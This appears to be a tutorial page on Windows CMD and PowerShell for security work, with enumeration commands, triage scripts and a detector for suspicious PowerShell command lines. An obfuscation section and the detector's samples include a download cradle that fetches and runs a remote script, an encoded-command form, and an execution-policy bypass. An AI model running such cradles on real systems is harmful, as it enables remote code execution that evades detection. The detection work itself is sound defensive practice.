# CMD and PowerShell

CMD is legacy but still functional.

PowerShell is where the actual power lives: it is object-oriented rather than text-based like Unix shells, so every command returns structured objects you can pipe, filter and manipulate without regex gymnastics.
## CMD Essentials

Note that `#` is not a comment character in CMD; the comments below use `::` so the lines can be pasted as-is.

```cmd
:: Recursive directory listing (bare paths only)
dir /s /b C:\Users
:: Show hidden/system files
dir /a
:: Display file content
type file.txt
:: grep equivalent
findstr "pattern" file.txt
:: List local users
net user
:: Admin group members
net localgroup administrators
:: Connections with PID and owning executable (-b needs an elevated prompt)
netstat -anob
:: Process list with details
tasklist /v
:: Scheduled tasks
schtasks /query /fo LIST /v
:: Full network configuration
ipconfig /all
:: Comprehensive system info
systeminfo
```
## PowerShell Basics

```powershell
Get-Command                        # List all available commands (cmdlets, functions, aliases)
Get-Help Get-Process -Examples     # Help system
Get-Process                        # Running processes
Get-Service                        # Windows services
Get-ChildItem C:\ -Recurse         # Recursive ls
Select-String "error" *.log        # grep equivalent
```
## PowerShell for Security

```powershell
# Event log analysis
Get-WinEvent -LogName Security -MaxEvents 100

# Check for admin users
Get-LocalGroupMember Administrators

# Network connections
Get-NetTCPConnection

# Running services
Get-Service | Where Status -eq "Running"

# Registry access (machine-wide autoruns)
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run
```
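The one-liners above each return objects, so they compose into a small triage script without any text parsing. The following is an added example (not code from the original page) that pulls the three checks together: a logon summary built from Security event 4624 with a server-side `FilterHashtable`, a sweep of the machine and user Run/RunOnce keys, and a list of Administrators members other than the built-in Administrator and Domain Admins. It assumes an elevated session on a Windows host whose Security log is readable; the function names are this example's own, while the event ID, property indices and registry paths are standard Windows values.

```powershell
# Added example, not from the original page. Assumes an elevated PowerShell 5+ session.

function Get-LogonSummary {
    param([int]$MaxEvents = 500)
    # FilterHashtable is evaluated by the event log service, which is far faster
    # than piping every event through Where-Object.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } -MaxEvents $MaxEvents |
        ForEach-Object {
            # 4624 EventData is positional: 5 = TargetUserName, 8 = LogonType, 18 = IpAddress
            [pscustomobject]@{
                Time      = $_.TimeCreated
                User      = $_.Properties[5].Value
                LogonType = $_.Properties[8].Value
                Source    = $_.Properties[18].Value
            }
        } |
        Group-Object User, LogonType |
        Sort-Object Count -Descending |
        Select-Object Count, Name
}

function Get-RunKeyEntries {
    # HKCU is included because per-user autoruns need no elevation to create.
    $keys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        # Get-ItemProperty adds PSPath/PSParentPath/... metadata; keep only real values.
        $item.PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' } |
            ForEach-Object {
                [pscustomobject]@{ Key = $key; Name = $_.Name; Command = $_.Value }
            }
    }
}

function Get-NonBuiltinAdmins {
    # Flag Administrators members whose SID is not RID 500 (built-in Administrator)
    # or RID 512 (Domain Admins); anything else deserves a second look.
    Get-LocalGroupMember -Group 'Administrators' |
        Where-Object { $_.SID.Value -notmatch '-(500|512)$' } |
        Select-Object Name, ObjectClass, PrincipalSource
}

# Usage
Get-LogonSummary -MaxEvents 200 | Format-Table -AutoSize
Get-RunKeyEntries                | Format-Table -AutoSize
Get-NonBuiltinAdmins
```

Because each function emits `[pscustomobject]` rows, the results can be further piped to `Export-Csv` or `ConvertTo-Json` for a ticket or a SIEM without reformatting.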
## Execution Policy

PowerShell restricts script execution by default. The execution policy is a convenience guard, not a security boundary: it only governs how `.ps1` files are loaded, not what interactive commands can run, which is why it is trivially changed.

```powershell
Get-ExecutionPolicy            # Check current policy
Set-ExecutionPolicy Bypass     # Allow all scripts (often needed; the default LocalMachine scope needs elevation and prompts for confirmation)
```
## Obfuscation Techniques

PowerShell enables easy obfuscation that bypasses basic string-matching detections.

```powershell
# Base64 encoded command
powershell -Enc <base64_string>

# Download cradle
IEX (New-Object Net.WebClient).DownloadString('http://host/payload.ps1')
```
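From the defender's side, both patterns above leave recognisable traces: the `-EncodedCommand` payload is UTF-16LE base64 that can be decoded straight from a process-creation or Script Block Logging event, and the cradle's `IEX`/`DownloadString` survive inside the decoded text. The following is an added example (not code from the original page) that scores command lines for these indicators and then applies the scoring to Script Block Logging events (ID 4104 in `Microsoft-Windows-PowerShell/Operational`) and process-creation events (Security 4688). It assumes those two audit sources are enabled with command-line capture; the sample command lines and the scoring weights are constructed for the example, and the function names are the example's own.

```powershell
# Added example, not from the original page. Assumes Script Block Logging (4104)
# and process-creation auditing with command lines (4688) are enabled.

function Test-SuspiciousCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    $score   = 0
    $reasons = [System.Collections.Generic.List[string]]::new()
    $decoded = $null

    # -EncodedCommand may be abbreviated to any unique prefix (-e, -ec, -enc, ...).
    if ($CommandLine -match '\s-e(c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})') {
        $score += 2; $reasons.Add('encoded command')
        try {
            # The payload is UTF-16LE, so decode with the Unicode encoding, not UTF-8.
            $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
        } catch { $reasons.Add('base64 did not decode') }
    }

    # Inspect the decoded script as well as the raw command line.
    $text = if ($decoded) { "$CommandLine`n$decoded" } else { $CommandLine }
    if ($text -match '\b(IEX|Invoke-Expression)\b')                       { $score += 2; $reasons.Add('Invoke-Expression') }
    if ($text -match 'DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b') { $score += 3; $reasons.Add('download cradle') }
    if ($text -match '-w(indowstyle)?\s+hidden|-nop\b|-noprofile')         { $score += 1; $reasons.Add('hidden/no-profile flags') }

    # Flags alone (score 1) are common in legitimate automation; require a stronger signal.
    [pscustomobject]@{
        Suspicious  = $score -ge 2
        Score       = $score
        Reasons     = ($reasons -join ', ')
        Decoded     = $decoded
        CommandLine = $CommandLine
    }
}

function Get-SuspiciousPowerShellEvents {
    param([int]$MaxEvents = 1000)
    # 4104: Properties[2] is the script block text. 4688: Properties[5] is the new
    # process name and Properties[8] the command line.
    $blocks = Get-WinEvent -FilterHashtable @{
            LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
            -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object { Test-SuspiciousCommandLine -CommandLine $_.Properties[2].Value }
    $procs = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } `
            -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties[5].Value -match 'powershell|pwsh' } |
        ForEach-Object { Test-SuspiciousCommandLine -CommandLine $_.Properties[8].Value }
    @($blocks) + @($procs) | Where-Object Suspicious
}

# Constructed sample lines; the base64 is simply "Get-Date" in UTF-16LE.
$samples = @(
    'powershell.exe -NoProfile -Command Get-Service',
    'powershell.exe -w hidden -enc RwBlAHQALQBEAGEAdABlAA==',
    "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://host/payload.ps1')"
)
$samples | ForEach-Object { Test-SuspiciousCommandLine -CommandLine $_ } |
    Format-Table Suspicious, Score, Reasons, Decoded -AutoSize

# Against live logs:
# Get-SuspiciousPowerShellEvents | Format-Table Score, Reasons, CommandLine -AutoSize
```

On the sample input the first line scores 1 and is not flagged, the second is flagged as an encoded command with `Get-Date` shown in the `Decoded` column, and the third is flagged for both `Invoke-Expression` and the download cradle. Decoding in the detection step matters because the indicators of the second pattern only become visible once the first pattern has been undone.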